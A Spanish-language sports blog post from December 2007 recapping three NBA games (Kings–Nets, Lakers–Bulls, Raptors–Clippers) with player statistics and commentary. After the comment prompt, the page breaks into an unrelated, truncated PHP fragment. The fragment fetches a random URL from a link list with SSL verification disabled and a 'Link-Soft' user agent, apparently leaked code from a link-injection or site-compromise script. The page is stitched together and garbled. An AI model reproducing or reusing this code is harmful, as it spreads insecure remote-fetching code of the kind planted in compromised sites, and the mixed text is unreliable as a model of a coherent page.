La crónica(18/12/07)

19 de December de 2007 por telekoman

La jornada nos ha deparado tres partidos en los que participaban equipos con urgencias, como Bulls, Clippers y Nets, contra equipos que van bien, como Lakers, Raptors y Kings. Los que estaban mal, están peor, y los que estaban bien, mejor. Hemos visto la resurrección de Odom en los Lakers y la caída a los infiernos de Gordon en Chicago, cómo la sociedad Calderón – Bosh funcionan a las mil maravillas, que las múltiples bajas de Clippers no le permiten ganar, aunque Kaman y Maggette lo intentan, que los Nets, pese a tener 3 grandes jugadores, no pueden ganar si el resto del equipo no acompaña mínimamente y que a los Kings sólo les falta tener un base de garantías para estar mucho más arriba.

 



Kings 106 – Nets 101

El problema de los Nets está muy claro. A diferencia de Boston, no les basta con tener 3 figuras. Al contrario de lo que sucede en Boston, el triángulo de los Nets no tiene más gente capaz de apoyarles. La baja de Krstic deja el juego interior de New Jersey tremendamente maltrecho y su sustituto, Josh Boone, no es capaz de aportar. Tan sólo Sean Williams, que salió de inicio, aportó 8 tapones igualando así el record de la franquicia. Las tres figuras siguen rindiendo, en especial Jefferson que volvió a hacer 36 puntos a los que añadió 9 rebotes y 6 pérdidas, y Kidd se quedó sólo a una asistencia del triple doble, pero no son capaces de mantener al equipo ellos solos durante los 48 minutos. En Sacramento sólo echan de menos la presencia de Bibby para que todo fuera mejor. El partido de hoy ha sido brillante, con Salmons subiendo su mejor marca personal a 31 puntos y con Francisco García haciendo la mejor puntuación de la temporada con 24. Junto a ellos, Ron Artest continua con su buen inicio de Regular Season aportando 20 puntos y Brad Miller, recuperando su mejor versión tras la lesión, con 23 puntos y 10 rebotes. El único punto negro en Sacramento es el puesto de base en el que Udrih no termina de asentarse y aunque ha repartido 8 asistencias, no ha aportado ningún punto al casillero.

Lakers 103 – Bulls 91

Esta vez no fue Kobe Bryant, con molestias musculares, el que ganó en exclusiva el partido para los Lakers. Tampoco Bynum, aunque al igual que Kobe, participó activamente con 12 puntos y 10 rebotes. El protagonista fue por fin Lamar Odom. Con 17 puntos y 16 rebotes Odom dio pie a las esperanzas de todos aquellos que pensamos que realmente puede ser un jugador importante en la NBA y en los Lakers. Junto a él Vujacic, otro de los irregulares, aportó 19 puntos para derrotar a unos Bulls con problemas. Tras un mal inicio de partido en el que falló los 6 primeros lanzamientos que intentó, Luol Deng fué el máximo anotador de los de Chicago con 26 puntos. Pero los Bulls estuvieron muy lastrados por el pésimo partido de Ben Gordon, que con sólo 8 puntos en los 32 minutos que jugó, no pudo superar en ningún momento la defensa angelina. Algo mejor estuvo Hinrich, anotando 17 puntos y repartiendo 8 asistencias, pero empañó su actuación perdiendo 6 veces el balón. Momento delicado para Chicago, que tras iniciar una leve mejoría tras el desolador inicio, parece que se ha vuelto a estancar.

Raptors 80 – Clippers 77


Tener un base que sepa leer bien la situación del partido te asegura que vas a estar en disposición de ganar el encuentro. Evidentemente, falta que la pelota entre. Para Toronto, ese base es Calderón. De nuevo el español dió una gran clase de como dirigir un equipo, consiguiendo además 12 puntos, 9 asistencias, 6 rebotes y ninguna pérdida de balon en los 38 minutos que estuvo en cancha. Pero siendo realistas, el mérito principal de la victoria de Toronto hay que asignárselo a Chris Bosh. Tras un primera parte negada en el tiro, Bosh se acercó más a la canasta, ejerciendo más de 4, para conseguir en el tercer cuarto 12 de sus 24 puntos. En este cuarto, los Raptors consiguieron remontar el partido a base de una defensa mucho más ajustada y ponerse por delante. Por parte de los Clippers, Corey Maggette logró 22 puntos, fallando 10 de los 17 tiros que intentó, y Kaman consiguió su 20 doble-doble de la temporada (4 más que en todo el año pasado). Pero al equipo de Los Angeles le sigue faltando rotación por las innumerables bajas y no es capaz de rematar los partidos.

 

Esta entrada no tiene comentarios... pero tú puedes ser el primero.

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>